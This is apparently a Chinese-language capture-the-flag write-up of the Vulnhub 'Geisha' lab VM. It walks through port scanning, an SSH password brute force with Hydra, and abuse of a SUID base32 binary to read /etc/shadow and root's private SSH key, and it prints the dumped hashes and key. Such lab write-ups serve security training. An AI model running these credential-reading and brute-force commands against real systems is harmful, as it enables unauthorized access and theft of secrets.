Vulnhub之Geisha靶机详细测试过程
Geisha
作者: jason_huawen
靶机信息
名称:Geisha: 1
地址:
https://www.vulnhub.com/entry/geisha-1,481/
识别目标主机IP地址
(kali㉿kali)-[~/Desktop/Vulnhub/Fsoft]
└─$ sudo netdiscover -i eth1 -r 192.168.56.0/24
Currently scanning: 192.168.56.0/24 | Screen View: Unique Hosts
3 Captured ARP Req/Rep packets, from 3 hosts. Total size: 180
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.56.1 0a:00:27:00:00:11 1 60 Unknown vendor
192.168.56.100 08:00:27:e2:ee:06 1 60 PCS Systemtechnik GmbH
192.168.56.200 08:00:27:37:a2:18 1 60 PCS Systemtechnik GmbH
利用Kali Linux自带的netdiscover工具识别目标主机IP地址为192.168.56.200
NMAP扫描
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Fsoft]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.200 -oN nmap_full_scan
Starting Nmap 7.92 ( https://nmap.org ) at 2023-02-23 00:24 EST
Nmap scan report for bogon (192.168.56.200)
Host is up (0.00026s latency).
Not shown: 65528 closed tcp ports (reset)
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 1b:f2:5d:cd:89:13:f2:49:00:9f:8c:f9:eb:a2:a2:0c (RSA)
| 256 31:5a:65:2e:ab:0f:59:ab:e0:33:3a:0c:fc:49:e0:5f (ECDSA)
|_ 256 c6:a7:35:14:96:13:f8:de:1e:e2:bc:e7:c7:66:8b:ac (ED25519)
80/tcp open http Apache httpd 2.4.38 ((Debian))
|_http-title: Geisha
|_http-server-header: Apache/2.4.38 (Debian)
7080/tcp open ssl/http LiteSpeed httpd
|_http-title: Geisha
| ssl-cert: Subject: commonName=geisha/organizationName=webadmin/countryName=US
| Not valid before: 2020-05-09T14:01:34
|_Not valid after: 2022-05-09T14:01:34
|_http-server-header: LiteSpeed
| tls-alpn:
| h2
| spdy/3
| spdy/2
|_ http/1.1
|_ssl-date: TLS randomness does not represent time
7125/tcp open http nginx 1.17.10
|_http-server-header: nginx/1.17.10
|_http-title: Geisha
8088/tcp open http LiteSpeed httpd
|_http-title: Geisha
|_http-server-header: LiteSpeed
9198/tcp open http SimpleHTTPServer 0.6 (Python 2.7.16)
|_http-title: Geisha
MAC Address: 08:00:27:37:A2:18 (Oracle VirtualBox virtual NIC)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 29.88 seconds
获得Shell
端口21
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Fsoft]
└─$ ftp 192.168.56.200
Connected to 192.168.56.200.
220 (vsFTPd 3.0.3)
Name (192.168.56.200:kali): anonymous
331 Please specify the password.
Password:
530 Login incorrect.
ftp: Login failed
ftp> quit
221 Goodbye.
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Fsoft]
└─$ searchsploit vsFTPd 3.0.3
-------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
-------------------------------------------------------------------------------------------- ---------------------------------
vsftpd 3.0.3 - Remote Denial of Service | multiple/remote/49719.py
-------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
-
目标主机不允许ftp匿名访问
-
ftp服务没有可利用的漏洞
端口80
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Fsoft]
└─$ ls
image.jpeg nmap_full_scan
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Fsoft]
└─$ steghide extract -sf image.jpeg
Enter passphrase:
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Fsoft]
└─$ stegseek image.jpeg
StegSeek 0.6 - https://github.com/RickdeJager/StegSeek
[i] Progress: 99.91% (133.3 MB)
[!] error: Could not find a valid passphrase.
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Fsoft]
└─$ nikto -h http://192.168.56.200
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 192.168.56.200
+ Target Hostname: 192.168.56.200
+ Target Port: 80
+ Start Time: 2023-02-23 00:41:49 (GMT-5)
---------------------------------------------------------------------------
+ Server: Apache/2.4.38 (Debian)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Server may leak inodes via ETags, header found with file /, inode: b0, size: 5a53871e2297f, mtime: gzip
+ Allowed HTTP Methods: POST, OPTIONS, HEAD, GET
+ OSVDB-3233: /icons/README: Apache default file found.
+ 7915 requests: 0 error(s) and 6 item(s) reported on remote host
+ End Time: 2023-02-23 00:42:13 (GMT-5) (24 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
*********************************************************************
Portions of the server's headers (Apache/2.4.38) are not in
the Nikto 2.1.6 database or are newer than the known string. Would you like
to submit this information (*no server specific data*) to CIRT.net
for a Nikto update (or you may email to sullo@cirt.net) (y/n)?
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Fsoft]
└─$ gobuster dir -u http://192.168.56.200 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.html,.txt,.sh
===============================================================
Gobuster v3.4
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.200
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.4
[+] Extensions: php,html,txt,sh
[+] Timeout: 10s
===============================================================
2023/02/23 00:42:48 Starting gobuster in directory enumeration mode
===============================================================
/.html (Status: 403) [Size: 279]
/index.html (Status: 200) [Size: 176]
/info.php (Status: 200) [Size: 2]
/.html (Status: 403) [Size: 279]
/server-status (Status: 403) [Size: 279]
Progress: 1102636 / 1102805 (99.98%)
===============================================================
2023/02/23 00:46:39 Finished
===============================================================
端口7125
──(kali㉿kali)-[~/Desktop/Vulnhub/Fsoft]
└─$ gobuster dir -u https://192.168.56.200:7125 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.html,.txt,.sh -k
===============================================================
Gobuster v3.4
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: https://192.168.56.200:7125
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.4
[+] Extensions: php,html,txt,sh
[+] Timeout: 10s
===============================================================
2023/02/23 00:50:35 Starting gobuster in directory enumeration mode
===============================================================
Error: error on running gobuster: unable to connect to https://192.168.56.200:7125/: Get "https://192.168.56.200:7125/": http: server gave HTTP response to HTTPS client
这里有错误,不是Https,而是http,导致无法运行
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Fsoft]
└─$ gobuster dir -u http://192.168.56.200:7125 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.html,.txt,.sh
===============================================================
Gobuster v3.4
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.200:7125
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.4
[+] Extensions: php,html,txt,sh
[+] Timeout: 10s
===============================================================
2023/02/23 01:08:15 Starting gobuster in directory enumeration mode
===============================================================
/index.php (Status: 200) [Size: 175]
/shadow (Status: 403) [Size: 154]
/passwd (Status: 200) [Size: 1432]
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Fsoft]
└─$ curl http://192.168.56.200:7125/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
systemd-timesync:x:101:102:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
systemd-network:x:102:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:103:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:104:110::/nonexistent:/usr/sbin/nologin
sshd:x:105:65534::/run/sshd:/usr/sbin/nologin
geisha:x:1000:1000:geisha,,,:/home/geisha:/bin/bash
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
lsadm:x:998:1001::/:/sbin/nologin
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Fsoft]
└─$ curl http://192.168.56.200:7125/shadow
<html>
<head><title>403 Forbidden</title></head>
<body>
<center><h1>403 Forbidden</h1></center>
<hr><center>nginx/1.17.10</center>
</body>
</html>
因为只有用户名geisha以及root有bash,接下来用hydra破解:
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Fsoft]
└─$ hydra -l geisha -P /usr/share/wordlists/rockyou.txt ssh://192.168.56.200
Hydra v9.3 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-02-23 01:10:43
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking ssh://192.168.56.200:22/
[STATUS] 133.00 tries/min, 133 tries in 00:01h, 14344269 to do in 1797:32h, 13 active
[STATUS] 92.00 tries/min, 276 tries in 00:03h, 14344126 to do in 2598:35h, 13 active
[22][ssh] host: 192.168.56.200 login: geisha password: letmein
1 of 1 target successfully completed, 1 valid password found
[WARNING] Writing restore file because 3 final worker threads did not complete until end.
[ERROR] 3 targets did not resolve or could not be connected
[ERROR] 0 target did not complete
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2023-02-23 01:16:25
Hydra工具爆破得到了用户geisha的密码。
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Fsoft]
└─$ ssh geisha@192.168.56.200
The authenticity of host '192.168.56.200 (192.168.56.200)' can't be established.
ED25519 key fingerprint is SHA256:LWeIcL34FqnZ8TRLsknNndBBthrC1xzr/sHP5yQHMxE.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.56.200' (ED25519) to the list of known hosts.
geisha@192.168.56.200's password:
Linux geisha 4.19.0-8-amd64 #1 SMP Debian 4.19.98-1+deb10u1 (2020-04-27) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Sat May 9 11:56:59 2020 from 192.168.1.21
geisha@geisha:~$ id
uid=1000(geisha) gid=1000(geisha) groups=1000(geisha),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev)
geisha@geisha:~$ sudo -l
[sudo] password for geisha:
Sorry, user geisha may not run sudo on geisha.
geisha@geisha:~$ ls -alh
total 20K
drwxr-xr-x 2 geisha geisha 4.0K Feb 23 08:30 .
drwxr-xr-x 3 root root 4.0K May 3 2020 ..
-rw-r--r-- 1 geisha geisha 220 May 3 2020 .bash_logout
-rw-r--r-- 1 geisha geisha 3.5K May 3 2020 .bashrc
-rw-r--r-- 1 geisha geisha 807 May 3 2020 .profile
geisha@geisha:~$ cd ..
geisha@geisha:/home$ ls -alh
total 12K
drwxr-xr-x 3 root root 4.0K May 3 2020 .
drwxr-xr-x 18 root root 4.0K May 3 2020 ..
drwxr-xr-x 2 geisha geisha 4.0K Feb 23 08:30 geisha
geisha@geisha:/home$ cd /var
geisha@geisha:/var$ ls -alh
total 48K
drwxr-xr-x 12 root root 4.0K May 9 2020 .
drwxr-xr-x 18 root root 4.0K May 3 2020 ..
drwxr-xr-x 2 root root 4.0K Feb 23 08:18 backups
drwxr-xr-x 9 root root 4.0K May 9 2020 cache
drwxr-xr-x 27 root root 4.0K May 9 2020 lib
drwxrwsr-x 2 root staff 4.0K Feb 1 2020 local
lrwxrwxrwx 1 root root 9 May 3 2020 lock -> /run/lock
drwxr-xr-x 7 root root 4.0K Feb 23 08:18 log
drwxrwsr-x 2 root mail 4.0K May 3 2020 mail
drwxr-xr-x 2 root root 4.0K May 3 2020 opt
lrwxrwxrwx 1 root root 4 May 3 2020 run -> /run
drwxr-xr-x 4 root root 4.0K May 3 2020 spool
drwxrwxrwt 4 root root 4.0K Feb 23 09:08 tmp
drwxr-xr-x 3 root root 4.0K May 9 2020 www
geisha@geisha:/var$ cd backups
geisha@geisha:/var/backups$ ls -alh
total 24K
drwxr-xr-x 2 root root 4.0K Feb 23 08:18 .
drwxr-xr-x 12 root root 4.0K May 9 2020 ..
-rw-r--r-- 1 root root 11K May 9 2020 apt.extended_states.0
-rw-r--r-- 1 root root 42 May 3 2020 apt.extended_states.1.gz
geisha@geisha:/var/backups$ cd ..
geisha@geisha:/var$ cd www
geisha@geisha:/var/www$ ls -alh
total 12K
drwxr-xr-x 3 root root 4.0K May 9 2020 .
drwxr-xr-x 12 root root 4.0K May 9 2020 ..
drwxr-xr-x 2 root root 4.0K May 9 2020 html
geisha@geisha:/var/www$ cd html
geisha@geisha:/var/www/html$ ls -alh
total 220K
drwxr-xr-x 2 root root 4.0K May 9 2020 .
drwxr-xr-x 3 root root 4.0K May 9 2020 ..
-rw-r--r-- 1 root root 203K Jul 1 2019 image.png
-rw-r--r-- 1 root root 176 May 9 2020 index.html
-rw-r--r-- 1 root root 2 May 9 2020 info.php
geisha@geisha:/var/www/html$ cd /tmp
geisha@geisha:/tmp$
提权
将linpeas.sh脚本上传至目标主机/tmp目录,修改权限,执行脚本:
═════════════════════════════════════════╣ Interesting Files ╠═════════════════════════════════════════
╚═══════════════════╝
╔══════════╣ SUID - Check easy privesc, exploits and write perms
╚ https://book.hacktricks.xyz/linux-unix/privilege-escalation#sudo-and-suid
strace Not Found
-rwsr-xr-x 1 root root 427K Jan 31 2020 /usr/lib/openssh/ssh-keysign
-rwsr-xr-- 1 root messagebus 50K Jun 9 2019 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root 10K Mar 28 2017 /usr/lib/eject/dmcrypt-get-device
-rwsr-xr-x 1 root root 44K Jul 27 2018 /usr/bin/newgrp ---> HP-UX_10.20
-rwsr-xr-x 1 root root 63K Jul 27 2018 /usr/bin/passwd ---> Apple_Mac_OSX(03-2006)/Solaris_8/9(12-2004)/SPARC_8/9/Sun_Solaris_2.3_to_2.5.1(02-1997)
-rwsr-xr-x 1 root root 35K Jan 10 2019 /usr/bin/umount ---> BSD/Linux(08-1996)
-rwsr-xr-x 1 root root 63K Jan 10 2019 /usr/bin/su
-rwsr-xr-x 1 root root 44K Jul 27 2018 /usr/bin/chsh
-rwsr-sr-x 1 root root 43K Feb 28 2019 /usr/bin/base32
-rwsr-xr-x 1 root root 154K Feb 2 2020 /usr/bin/sudo ---> check_if_the_sudo_version_is_vulnerable
-rwsr-xr-x 1 root root 83K Jul 27 2018 /usr/bin/gpasswd
-rwsr-xr-x 1 root root 53K Jul 27 2018 /usr/bin/chfn ---> SuSE_9.3/10
-rwsr-xr-x 1 root root 51K Jan 10 2019 /usr/bin/mount ---> Apple_Mac_OSX(Lion)_Kernel_xnu-1699.32.7_except_xnu-1699.24.8
从linpeas.sh脚本运行结果可知,可以利用base32的SUID位提权
geisha@geisha:/tmp$ LFILE=/etc/shadow
geisha@geisha:/tmp$ /usr/bin/base32 "$LFILE" | base32 --decode
root:$6$p/n6gA9F6qb7..aD$d4YNXyKsg.Tam5AoDiOp0T9rWAMAkN55O9.BTyhyOacdXHgpTkpbE9nBe5R35oFzntg7prt3xfdSW9U9Ty1680:18391:0:99999:7:::
daemon:*:18385:0:99999:7:::
bin:*:18385:0:99999:7:::
sys:*:18385:0:99999:7:::
sync:*:18385:0:99999:7:::
games:*:18385:0:99999:7:::
man:*:18385:0:99999:7:::
lp:*:18385:0:99999:7:::
mail:*:18385:0:99999:7:::
news:*:18385:0:99999:7:::
uucp:*:18385:0:99999:7:::
proxy:*:18385:0:99999:7:::
www-data:*:18385:0:99999:7:::
backup:*:18385:0:99999:7:::
list:*:18385:0:99999:7:::
irc:*:18385:0:99999:7:::
gnats:*:18385:0:99999:7:::
nobody:*:18385:0:99999:7:::
_apt:*:18385:0:99999:7:::
systemd-timesync:*:18385:0:99999:7:::
systemd-network:*:18385:0:99999:7:::
systemd-resolve:*:18385:0:99999:7:::
messagebus:*:18385:0:99999:7:::
sshd:*:18385:0:99999:7:::
geisha:$6$T3Eaf.KNaM9VPSMw$J5gIF6yNaKpyEXW77KtMUqtra1aE5sfQvWis48mofoo1L2bpl6vmU5riEDTGrPl0CvdwzuZJMqIp.LIHatkjn.:18391:0:99999:7:::
systemd-coredump:!!:18385::::::
ftp:*:18391:0:99999:7:::
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Geisha]
└─$ vim shadow1
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Geisha]
└─$ vim passwd1
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Geisha]
└─$ cat shadow1
root:$6$p/n6gA9F6qb7..aD$d4YNXyKsg.Tam5AoDiOp0T9rWAMAkN55O9.BTyhyOacdXHgpTkpbE9nBe5R35oFzntg7prt3xfdSW9U9Ty1680:18391:0:99999:7:::
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Geisha]
└─$ cat passwd1
root:x:0:0:root:/root:/bin/bash
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Geisha]
└─$ unshadow passwd1 shadow1 > enc.txt
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Geisha]
└─$ john --wordlist=/usr/share/wordlists/rockyou.txt enc.txt
Warning: detected hash type "sha512crypt", but the string is also recognized as "HMAC-SHA256"
Use the "--format=HMAC-SHA256" option to force loading these as that type instead
Warning: detected hash type "sha512crypt", but the string is also recognized as "HMAC-SHA512"
Use the "--format=HMAC-SHA512" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 1 password hash (sha512crypt, crypt(3) $6$ [SHA512 256/256 AVX2 4x])
Cost 1 (iteration count) is 5000 for all loaded hashes
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
0g 0:00:03:51 3.41% (ETA: 03:19:31) 0g/s 2452p/s 2452c/s 2452C/s whoabuddy..wh1tney
Session aborted
没有破解出来,应该尝试读取root用户的私钥文件
geisha@geisha:/tmp$ LFILE=/root/.ssh/id_rsa
geisha@geisha:/tmp$ /usr/bin/base32 "$LFILE" | base32 --decode
-----BEGIN RSA PRIVATE KEY-----
MIIEpQIBAAKCAQEA43eVw/8oSsnOSPCSyhVEnt01fIwy1YZUpEMPQ8pPkwX5uPh4
OZXrITY3JqYSCFcgJS34/TQkKLp7iG2WGmnno/Op4GchXEdSklwoGOKNA22l7pX5
89FAL1XSEBCtzlrCrksvfX08+y7tS/I8s41w4aC1TDd5o8c1Kx5lfwl7qw0ZMlbd
5yeAUhuxuvxo/KFqiUUfpcpoBf3oT2K97/bZr059VU8T4wd5LkCzKEKmK5ebWIB6
fgIfxyhEm/o3dl1lhegTtzC6PtlhuT7ty//mqEeMuipwH3ln61fHXs72LI/vTx26
TSSmzHo8zZt+/lwrgroh0ByXbCtDaZjo4HAFfQIDAQABAoIBAQCRXy/b3wpFIcww
WW+2rvj3/q/cNU2XoQ4fHKx4yqcocz0xtbpAM0veIeQFU0VbBzOID2V9jQE+9k9U
1ZSEtQJRibwbqk1ryDlBSJxnqwIsGrtdS4Q/CpBWsCZcFgy+QMsC0RI8xPlgHpGR
Y/LfXZmy2R6E4z9eKEYWlIqRMeJTYgqsP6ZR4SOLuZS1Aq/lq/v9jqGs/SQenjRb
8zt1BoqCfOp5TtY1NoBLqaPwmDt8+rlQt1IM+2aYmxdUkLFTcMpCGMADggggtnR+
10pZkA6wM8/FlxyAFcNwt+H3xu5VKuQKdqTfh1EuO3c34UmuS1qnidHO1rYWOhYO
jceQYzoBAoGBAP/Ml6cp2OWqrheJS9Pgnvz82n+s9yM5raKNnH57j0sbEp++eG7o
2po5/vrLBcCHGqZ7+RNFXDmRBEMToru/m2RikSVYk8QHLxVZJt5iB3tcxmglGJj/
cLkGM71JqjHX/edwu2nNu14m4l1JV9LGvvHR5m6uU5cQvdcMTsRpkuxdAoGBAOOl
THxiQ6R6HkOt9w/WrKDIeGskIXj/P/79aB/2p17M6K+cy75OOYzqkDPENrxK8bub
RaTzq4Zl2pAqxvsv/CHuJU/xHs9T3Ox7A1hWqnOOk2f0KBmhQTYBs2OKqXXZotHH
xvkOgc0fqRm1QYlCK2lyBBM14O5Isud1ZZXLUOuhAoGBAIBds1z36xiV5nd5NsxE
1IQwf5XCvuK2dyQz3Gy8pNQT6eywMM+3mrv6jrJcX66WHhGd9QhurjFVTMY8fFWr
edeOfzg2kzC0SjR0YMUIfKizjf2FYCqnRXIUYrKC3R3WPlx+fg5CZ9x/tukJfUEQ
65F+vBye7uPISvw3+O8n68shAoGABXMyppOvrONjkBk9Hfr0vRCvmVkPGBd8T71/
XayJC0L6myG02wSCajY/Z43eBZoBuY0ZGL7gr2IG3oa3ptHaRnGuIQDTzQDj/CFh
zh6dDBEwxD9bKmnq5sEZq1tpfTHNrRoMUHAheWi1orDtNb0Izwh0woT6spm49sOf
v/tTH6ECgYEA/tBeKSVGm0UxGrjpQmhW/9Po62JNz6ZBaTELm3paaxqGtA+0HD0M
OuzD6TBG6zBF6jW8VLQfiQzIMEUcGa8iJXhI6bemiX6Te1PWC8NMMULhCjObMjCv
bf+qz0sVYfPb95SQb4vvFjp5XDVdAdtQov7s7XmHyJbZ48r8ISHm98s=
-----END RSA PRIVATE KEY-----
成功利用base32的SUID位读取了root用户的私钥文件,修改其权限后,以root用户连接ssh:
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Geisha]
└─$ ssh -i id_rsa root@192.168.56.200
Linux geisha 4.19.0-8-amd64 #1 SMP Debian 4.19.98-1+deb10u1 (2020-04-27) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Sat May 9 12:03:57 2020 from 192.168.1.21
root@geisha:~# id
uid=0(root) gid=0(root) groups=0(root)
root@geisha:~# ls -alh
total 32K
drwx------ 4 root root 4.0K Feb 23 08:30 .
drwxr-xr-x 18 root root 4.0K May 3 2020 ..
-rw-r--r-- 1 root root 570 Jan 31 2010 .bashrc
-rw-r--r-- 1 root root 27 May 9 2020 flag.txt
drwxr-xr-x 3 root root 4.0K May 9 2020 .local
-rw-r--r-- 1 root root 148 Aug 17 2015 .profile
-rw-r--r-- 1 root root 66 May 9 2020 .selected_editor
drwxr-xr-x 2 root root 4.0K May 9 2020 .ssh
root@geisha:~# cat flag.txt
Flag{Sun_CTF_220_5_G31sha}
root@geisha:~#
提权成功,并拿到了root flag.
经验教训
-
由于本靶机的开放端口比较多,而且页面返回内容差不多,容易急躁,就是因为这种急躁,在用gobuster工具枚举目录时,错误的输入https,导致无法正常运行,并且还忽略了这种错误,而恰恰是本靶机的关键步骤。
-
当获得Shell后,而且有命令或者工具可以读取文件,并且只有读取权限,而不是写入权限,那么提权的思路有两个:
1)读取/etc/shadow文件内容,然后破解shadow
2)看是否可以读取私钥文件
STRIVE FOR PROGRESS,NOT FOR PERFECTION
